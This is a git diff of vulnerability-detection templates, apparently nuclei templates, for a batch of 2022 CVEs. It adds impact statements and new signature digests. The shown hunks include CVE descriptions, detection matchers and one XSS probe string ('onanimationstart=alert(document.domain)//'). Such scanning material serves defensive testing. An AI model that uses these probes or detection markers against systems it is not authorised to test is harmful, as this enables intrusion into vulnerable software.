\ No newline at end of file
+# digest: 4a0a0047304502203f84421bb81ac7c8bab69f6c3fc80f9033a30eede0c39f88815c020fd721621f022100e2301c4c420c899a0369192436321455022fb9a6ca98702cdb5e8c0af0fde118:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-29009.yaml b/http/cves/2022/CVE-2022-29009.yaml
index a156edbcf6..643e6f8ccd 100644
--- a/http/cves/2022/CVE-2022-29009.yaml
+++ b/http/cves/2022/CVE-2022-29009.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Cyber Cafe Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022011b33d4999965a38bf90c48cfde7bea30feb9f1c2b15ad2899a15ec8868b6e2402200fdc70755a2da5cd7e4c9bdadb4cbaf09ee19f760616741f29d34de748312dcb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210086529bd9263fd1101f5288a4dd50d91213549bbfec95afebd73c018c322bab8b022100e5efadd168e18c8cba76c20778dff2dcc8a79514efa4b55ced7d352b9548903e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-29014.yaml b/http/cves/2022/CVE-2022-29014.yaml
index 3e88b573c6..0b10943bb1 100644
--- a/http/cves/2022/CVE-2022-29014.yaml
+++ b/http/cves/2022/CVE-2022-29014.yaml
@@ -5,6 +5,8 @@ info:
   author: edoardottt
   severity: high
   description: Razer Sila Gaming Router 2.0.441_api-2.0.418 is vulnerable to local file inclusion which could allow attackers to read arbitrary files.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system.
   remediation: |
     Apply the latest firmware update provided by Razer to fix the Local File Inclusion vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022018e32f8ca79f2fad3c93f4f1f79ed49a166827feae627af42a53ea8deb17ad560220153af8a8a6567b78ad3e9a9534c64f03bb96bc6b1279a2d8921231c23fa24f56:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210086a64a49791a1805cb9bfb217876886c6ceff84131292a050fa4577c3c9d2ce8022010ae77bbe164ade26b999e6e56515e65c667b794c6c0dbd9cfb50245e685610a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-29078.yaml b/http/cves/2022/CVE-2022-29078.yaml
index 4eba20dbba..04809ef58c 100644
--- a/http/cves/2022/CVE-2022-29078.yaml
+++ b/http/cves/2022/CVE-2022-29078.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Node.js Embedded JavaScript 3.1.6 is susceptible to server-side template injection via settings[view options][outputFunctionName], which is parsed as an internal option and overwrites the outputFunctionName option with an arbitrary OS command, which is then executed upon template compilation.
+  impact: |
+    Remote code execution can lead to unauthorized access, data leakage, and complete system compromise.
   remediation: |
     Upgrade to a patched version of Node.js Embedded JavaScript (3.1.7 or higher) to mitigate the vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
         part: body
         words:
           - You are viewing page number
-# digest: 4a0a004730450220037dae1d422c2b0bfaa5736179cd1c0fd680827e4338c38ce53f38197a480858022100f63edc5fd9bd983aefafa247a8f9b63d51464614c19897f9531447a21943dd70:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022053def3b6ca7935bf3d2e899c217cfae78580052c730141c1d49fa29c7eea1ed602201037056573c595bbbb08705be5331a38050800cc4189acee1cd5bfd641d23c06:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml
index 398b15a298..d1cd7c855e 100644
--- a/http/cves/2022/CVE-2022-29153.yaml
+++ b/http/cves/2022/CVE-2022-29153.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     HashiCorp Consul and Consul Enterprise up to 1.9.16, 1.10.9, and 1.11 are susceptible to server-side request forgery. When redirects are returned by HTTP health check endpoints, Consul follows these HTTP redirects by default. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to send crafted requests to internal resources, leading to unauthorized access or information disclosure.
   remediation: 1) HTTP + interval health check configuration provides a disable_redirects option to prohibit this behavior. 2) Fixed in 1.9.17, 1.10.10, and 1.11.5.
   reference:
     - https://discuss.hashicorp.com/t/hcsec-2022-10-consul-s-http-health-check-may-allow-server-side-request-forgery/38393
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 400
-# digest: 4b0a00483046022100bedef50726e4baff7828bb484c8077b43f69f43019419e7108657f3df4edaafa022100d6dfb753fc2e99183713b3475e1bcf32f53e6863b819ed1ef7487f7f80b0c673:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b47012ec9b2acd0e4ee65060206e85dce6144dfcdcf15aa28cf8e3afc3a9398b0220396d7b6861f755d0db929acd66c8bd8e3a1bfab1d9dd4ba4f696bd44f225de5e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-29272.yaml b/http/cves/2022/CVE-2022-29272.yaml
index d9c5b31a76..fa43786e25 100644
--- a/http/cves/2022/CVE-2022-29272.yaml
+++ b/http/cves/2022/CVE-2022-29272.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Nagios XI through 5.8.5 contains an open redirect vulnerability in the login function. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.
   remediation: |
     Upgrade Nagios XI to version 5.8.5 or later to mitigate the vulnerability.
   reference:
@@ -57,4 +59,4 @@ http:
           - "<input type='hidden' name='nsp' value='(.*)'>"
         internal: true
         part: body
-# digest: 4a0a00473045022100c030154dd9aad320b83ed72c2de9609059044333b503e09ead853dea6115e83102204f9b5097b6b2ca672d8445e8ec675794d12e8f094e801c07575d978056855eb2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203aa4a981b72b44c07b9abd5e8761d2926cf6ffaaba5940c12fae5bb66f10e8da022100cf0e181b5f01ace6d97a42fc697b646475b9864aa4432efb57de15e84e2ea1da:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-29298.yaml b/http/cves/2022/CVE-2022-29298.yaml
index 6d5928560f..b9e107dc46 100644
--- a/http/cves/2022/CVE-2022-29298.yaml
+++ b/http/cves/2022/CVE-2022-29298.yaml
@@ -5,6 +5,8 @@ info:
   author: ritikchaddha
   severity: high
   description: SolarView Compact 6.00 is vulnerable to local file inclusion which could allow attackers to access sensitive files.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in SolarView Compact 6.00.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100f20ed48cc6ad5072d16d1b58a0b01af11dc20a546950ccd7d01f211d7bdc19e70220704e0cf67169ba46a99188a55c1beda8c38dbcb14f74a55e7c176a064d36b229:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e499a8e577923564dbf9e7892bfaaea305212bfb0e262e55d5d225c617db20e902201014b1747c87730f42e2e4c1c934b368f243bbfeed18eff336b4a1246b02cddb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-29299.yaml b/http/cves/2022/CVE-2022-29299.yaml
index 32c22f8a51..b4c565db92 100644
--- a/http/cves/2022/CVE-2022-29299.yaml
+++ b/http/cves/2022/CVE-2022-29299.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'time_begin' parameter to Solar_History.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
   reference:
@@ -41,5 +43,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4b0a004830460221009d43ac4959a7325c6f69198d1f4deed2badad16a8b12f0574e86dd9edbb3ee1f02210097baa8089139ece7b77d9102f25d6adfb31f9d4cfaa08609a37e6c9548ca8a01:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009846dbc0075d8753351291830945f6f4c84b1e9e7ad10d215a6f156db55353c0022049562686dbf9d9cf8db9f2015ab23f12f24ea082c7207898a8bd01dd9ba2075a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-29301.yaml b/http/cves/2022/CVE-2022-29301.yaml
index 99456d2ede..fd4dd5fc00 100644
--- a/http/cves/2022/CVE-2022-29301.yaml
+++ b/http/cves/2022/CVE-2022-29301.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'pow' parameter to Solar_SlideSub.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest patch or upgrade to a non-vulnerable version of SolarView Compact.
   reference:
@@ -41,5 +43,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4b0a004830460221008e627ac7d54b1d4dfaf31c21b84400d4e44362d05e465588eaab36badb1eb27e022100cd013888f9411930a566938c3fb1a825f4675416692de7b6138192c0c6681925:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b3edaaf8c05a14a8acd2a99b1a0abd57b7fb71b2faec9f2d0c8b8975a3e8c43202202c62d25ef277632bf6a301f91deec2e506f3be4785176df586a46977e4dcd0c3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-29303.yaml b/http/cves/2022/CVE-2022-29303.yaml
index f6b50cc141..0cf9ca0db9 100644
--- a/http/cves/2022/CVE-2022-29303.yaml
+++ b/http/cves/2022/CVE-2022-29303.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     SolarView Compact 6.00 was discovered to contain a command injection vulnerability via conf_mail.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the system.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00.
   reference:
@@ -52,4 +54,4 @@ http:
         part: body
         words:
           - "p1_network_mail.cgi"
-# digest: 4a0a00473045022014b5c7ca13fbca762379cb6d0ebd44cae696d4e14fa807ead4191b2b97a21efe022100f6518262d05b18afedfe0585468f8523d76efc7c2a862cbe8c0a236f0de37623:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f762cb681ad0bc77b7c5aa6baf996359a20eed4d6bfd5b7c0ec19697a0518260022100f5308ab0d175ca0df44c41b9c499570844bc50d7391087b15c44f27d84dc5958:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-29349.yaml b/http/cves/2022/CVE-2022-29349.yaml
index a2b2d3945a..1abb593526 100644
--- a/http/cves/2022/CVE-2022-29349.yaml
+++ b/http/cves/2022/CVE-2022-29349.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     kkFileView 4.0.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patch or upgrade to a newer version of kkFileView to mitigate the XSS vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221009ec3b902f9ba3214f656fcbb015c7551c18db14ab189e516d5711f3d1106c94f0220671c4d65a5b802cf938b9e03f400f0bb4f46f8186db671722e91700dedc29371:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200f504c9ef444c3af930f06d454201d943b59dca699e94e84aaac0bcf3080d04102203af9ebb7bb4a9edc0d279d8bc61fe1b756c7148d958f9e9fbb32145b746fcb92:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-29383.yaml b/http/cves/2022/CVE-2022-29383.yaml
index 56487b8cd3..b8b3d27d31 100644
--- a/http/cves/2022/CVE-2022-29383.yaml
+++ b/http/cves/2022/CVE-2022-29383.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     NETGEAR ProSafe SSL VPN multiple firmware versions were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL commands, potentially leading to unauthorized access, data leakage, or denial of service.
   remediation: |
     Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
           - contains(body_1, "User authentication Failed")
           - contains(body_2, "User Login Failed for SSLVPN User.")
         condition: and
-# digest: 4a0a00473045022100cd3b729283a0d97b84fca52c2c563b1f6761c6532184b062e54c81e61e050b6002200c208b6fc3ea6c820049c9040b233c57c7a6284c79592ad87bc0450ac973bfb6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100878dbb4daa7b6dccf604882fa65458edceee89569b9a6034a251cb35c08ed678022100c763f2657db4ea566acc5f8106f43cbd213fe538e08972a1bd578301c0d5e42d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-29455.yaml b/http/cves/2022/CVE-2022-29455.yaml
index 3b9fb05be0..afe69d1aea 100644
--- a/http/cves/2022/CVE-2022-29455.yaml
+++ b/http/cves/2022/CVE-2022-29455.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Elementor Website Builder plugin 3.5.5 and prior contains a reflected cross-site scripting vulnerability via the document object model.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade WordPress Elementor Website Builder to version 3.5.6 or later to mitigate this vulnerability.
   reference:
@@ -62,4 +64,4 @@ http:
         group: 1
         regex:
           - "(?m)Stable tag: ([0-9.]+)"
-# digest: 4a0a0047304502200d69b7d89471647ab67371bd25fa4610292dcf1fca981cb55bcf2f163eff8f400221009f786c83c1dd65a2187fa74a2dbdf68dd388652de0ed8578d56a755dad97670b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008edbcf857e706e72cfa41c8a6c353467603f28da4ef37b6e433aacedfd6d6415022100a2f61f7191a711bc7e39fc106c4ef61c56097f6f7841cd918904d2f1ce18fac0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-29464.yaml b/http/cves/2022/CVE-2022-29464.yaml
index dd03847265..8426929700 100644
--- a/http/cves/2022/CVE-2022-29464.yaml
+++ b/http/cves/2022/CVE-2022-29464.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Certain WSO2 products allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to upload malicious files and execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches and updates provided by WSO2 to mitigate this vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: dsl
         dsl:
           - "contains(body_2, 'WSO2-RCE-CVE-2022-29464')"
-# digest: 4a0a0047304502202547ca210572ad0586f3ca20b3ba7ebe65b1be7126c6de5c6afcfbdc2d2a91fd022100ac72643567a0c985b198f591bb85ab574a853574da5e9cb606789ca98ce4ca4f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022049341c7d04e5d7baf7a168a4e37a05b03a6911366985c6c499cb75a1df31fb34022100b88833029795c8cfb7e7af26ecf1725c6bb76aa3330396403ab8708a6d376172:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-29548.yaml b/http/cves/2022/CVE-2022-29548.yaml
index d67fddd378..374b814929 100644
--- a/http/cves/2022/CVE-2022-29548.yaml
+++ b/http/cves/2022/CVE-2022-29548.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WSO2 contains a reflected cross-site scripting vulnerability in the Management Console of API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
   remediation: |
     Apply the latest security patches or updates provided by WSO2 to fix the XSS vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402202951389575da965ce6a51859853fe01d25a65891ab56beab11d804e1e62630c002202b1576bc79c33cee516939f2efa81a86f38b58bf8f1d5053832f7e5c8a224315:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008c44db4f3c2fd1a86e1de594cda335eeaa94af163f111b2f15c9e7df822374fe02205143f2beaba3c4beb4ed6c250b5355288ac988ee5c890efc9bf8d7888f923028:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-29775.yaml b/http/cves/2022/CVE-2022-29775.yaml
index 74597cf751..dbd4b01712 100644
--- a/http/cves/2022/CVE-2022-29775.yaml
+++ b/http/cves/2022/CVE-2022-29775.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     iSpy 7.2.2.0 contains an authentication bypass vulnerability. An attacker can craft a URL and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system.
   remediation: |
     Upgrade to the latest version of iSpy (7.2.2.1 or higher) which includes a fix for the authentication bypass vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022063f14556c85043df6707a03b599396e4c0878f9d96baae4abb7495844459cf4102210090ee53c2b93f7ca2adf3d66d8809129051e5277ea88bd65402ab81101c580fec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f942f0038dbbf8539539fd176edbb12bce115464dc3dbcf85ea19f658ab1b8af02206684c6b1f13bd564b08c89ff62fff68ac8975b6df13ab4791c357a813dc4096a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-30073.yaml b/http/cves/2022/CVE-2022-30073.yaml
index 7752015eba..c083da7deb 100644
--- a/http/cves/2022/CVE-2022-30073.yaml
+++ b/http/cves/2022/CVE-2022-30073.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WBCE CMS 1.5.2 contains a stored cross-site scripting vulnerability via \admin\user\save.php Display Name parameters.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to a patched version of WBCE CMS or apply the vendor-supplied patch to mitigate this vulnerability.
   reference:
@@ -74,4 +76,4 @@ http:
           - '<input\stype="hidden"\sname="formtoken"\svalue="([^"]*)"\s/>'
         internal: true
         part: body
-# digest: 4a0a00473045022100bce0ffdcdebe0259fbaf88becd3fe828a2d43f2aea261d547f2c20f397817a8202207418d8b95d7de911bd56493b46382c943049443ec951e7291ec2ae711e8a127d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022001971a68ae514ecf0e5abc1d8918f74c6322d6fe156b5a159fb465556c535ac902203f14b67d97b5a67d7d80ef84e6afb8e012bda32d25e8950e01ae265f103877b8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-30489.yaml b/http/cves/2022/CVE-2022-30489.yaml
index 9e935674e9..848b99789a 100644
--- a/http/cves/2022/CVE-2022-30489.yaml
+++ b/http/cves/2022/CVE-2022-30489.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Wavlink WN-535G3 contains a POST cross-site scripting vulnerability via the hostname parameter at /cgi-bin/login.cgi.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022041a98fbbb6395a9d1693dc236d5366a3ec36ac8fe12ce282ca0b0e5b4a29b4540220719047e817c87a3dd869b7f503fb831d9cd7d1a9764209c767f145484e6c6b4f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220388e7927e7f0d2a908ba77d5f92ba218a1bcdf66f710d1319b2b03754eb83d9f0221009644f63b5446baa5bdf5261ee7ed4cd490af4d38dcfeced6460e490faa115c0f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-30512.yaml b/http/cves/2022/CVE-2022-30512.yaml
index eecaf1e0dc..7ed417aa77 100644
--- a/http/cves/2022/CVE-2022-30512.yaml
+++ b/http/cves/2022/CVE-2022-30512.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     School Dormitory Management System 1.0 contains a SQL injection vulnerability via accounts/payment_history.php:31. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the School Dormitory Management System 1.0.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022061fcb7332e8019363535ec006b76b305807600d6e0619336ef3eb66e8fc5803502203bd6d34d3a51a2cfdac7be7ba6029b1ded11895f9abc8fba33ccca0a00332c2f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ded723119502b77600bd54ce015557e175f66f94bea5572730a839790fa949aa022021dd9515576c922b00f85b909e4bd6aa397f616ff30e39038a48b86d48ab489c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-30513.yaml b/http/cves/2022/CVE-2022-30513.yaml
index 67e1dc58c8..33237a4c22 100644
--- a/http/cves/2022/CVE-2022-30513.yaml
+++ b/http/cves/2022/CVE-2022-30513.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     School Dormitory Management System 1.0 contains an authenticated cross-site scripting vulnerability via admin/inc/navigation.php:125. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an authenticated attacker to inject malicious scripts into the application, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100bea1d84612387d74b7e08e24589f3aa67b130727355be91cf87cd2b49d7df2960220599e75e2afa01b9b05bb9a276dbd01538e683ba5ef0b0b61149b6a821b536f72:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220048f2390c65ec195a79c21ffb7e1781f8286053183a4b1f7317234a8ac4dd131022100d40bbab88e023c633e8f6919531bcc6171e11bf3d30c64ccfe22667b25caa9e0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-30514.yaml b/http/cves/2022/CVE-2022-30514.yaml
index 93301756c8..3c3ce6f35f 100644
--- a/http/cves/2022/CVE-2022-30514.yaml
+++ b/http/cves/2022/CVE-2022-30514.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     School Dormitory Management System 1.0 contains an authenticated cross-site scripting vulnerability in admin/inc/navigation.php:126. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an authenticated attacker to inject malicious scripts into the application, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210081cfe98670dbb2adff8aabb48273351c7ac91fd810f2d313a3f55334f95d39dd022100b9f0d3cc01b9309fffdd83c60c533591de43b4c8ac5c29f511e40069a210e3c5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022026839c1c33b0debf9b4777d96f624a8113461f739f42db3961008d174613ca5f02210087e3e3b82d904ccad4d7bea75b65fa157dbe45e9c5713d06b9a9695efb96ea10:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-30525.yaml b/http/cves/2022/CVE-2022-30525.yaml
index 689084d37a..ab4ed10718 100644
--- a/http/cves/2022/CVE-2022-30525.yaml
+++ b/http/cves/2022/CVE-2022-30525.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected system.
   remediation: |
     Apply the latest security patches or firmware updates provided by Zyxel to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 490a0046304402200c947d41715c5035eb110a2d83b982ef98dcc7e7c131c0b34edc13f51213b2550220052d25d35e867606c144afa5a4b93aa596d715ad593250f69aea55f0fe97c65b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206e8cf62e531505a2d35977a5efa6c025263c0beeb0fdb037f9feb3d738d0be6d022100f38e717b95b7fbe0cda81f214bc15cbbc32911aad80c8cba6b9a4949a7509ddd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-3062.yaml b/http/cves/2022/CVE-2022-3062.yaml
index a6c7d28511..4f665fbc8b 100644
--- a/http/cves/2022/CVE-2022-3062.yaml
+++ b/http/cves/2022/CVE-2022-3062.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The plugin does not escape parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: Fixed in version 4.4.12
   reference:
     - https://wpscan.com/vulnerability/2e829bbe-1843-496d-a852-4150fa6d1f7a
@@ -47,4 +49,4 @@ http:
           - 'contains(body_2, "ee-simple-file-list")'
           - 'contains(body_2, "onanimationstart=alert(document.domain)//")'
         condition: and
-# digest: 4a0a00473045022100fe8cc31a77438bc505932af02688ee007910d931b1dd2005090b4ee25f2ada47022004248c2c3ef8abeb5a3555ae387bee31a771dadb4738e9e9b4b2932431abd213:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
